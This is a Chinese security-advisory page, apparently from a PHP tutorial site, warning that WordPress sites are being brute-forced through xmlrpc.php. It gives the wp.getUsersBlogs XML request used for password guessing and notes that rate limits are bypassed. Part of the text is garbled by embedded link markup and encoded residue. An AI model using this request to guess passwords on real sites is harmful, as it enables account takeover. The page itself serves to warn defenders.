网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

利用xmlrpc.php对WordPress进行暴力破解攻击 - 网站安

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 近几天wordpress社区的小伙伴们反映遭到了利用xmlrpc php进行暴力破解的攻击。利用xmlrpc php提供的接口尝试猜解用户的密码,可以绕过wordpress对暴力破解的限制。已经发现了大规模的利用,...

近几天wordpress社区的小伙伴们反映遭到了利用破解" title="\">xmlrpc.php进行暴力破解的攻击。利用xmlrpc.php提供的接口尝试猜解用户的密码,可以绕过wordpress对暴力破解的限制。已经发现了大规模的利用,启用了xmlrpc的同学需要尽快修复。安装或者升级Login Security Solutin插件

通常wZ喎"http://www.2cto.com/kf/ware/vc/" target="_blank" class="keylink">vcmRwcmVzc7XHwry907/atrzKx9f2wcu3wLGpwabGxr3it8C7pLXEo6yxyMjnZnJlZWJ1ZrXEtcfCvNa7xNzT0LOiytQ1tM6hozwvcD4NCjxwIHN0eWxlPQ=="text-align: center;">

这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc.php.
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
   <param><value>username</value></param>
   <param><value>password</value></param>
  </params>
</methodCall>

其中username字段是预先收集的用户名。password是尝试的密码。关于getUsersBlogs接口的更多信息可以参考官方的指南。如果密码正确,返回为:

密码错误返回为403:

使用intruder进行测试,发现服务端没有进行限制。






自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论